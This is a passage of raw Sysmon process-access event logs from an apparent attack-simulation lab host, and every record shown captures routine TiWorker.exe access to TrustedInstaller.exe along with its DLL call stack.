System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.570{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.555{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.555{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.555{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.555{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.539{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.539{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.539{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.539{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.539{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.539{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.523{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.523{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.523{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.523{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.523{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.508{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
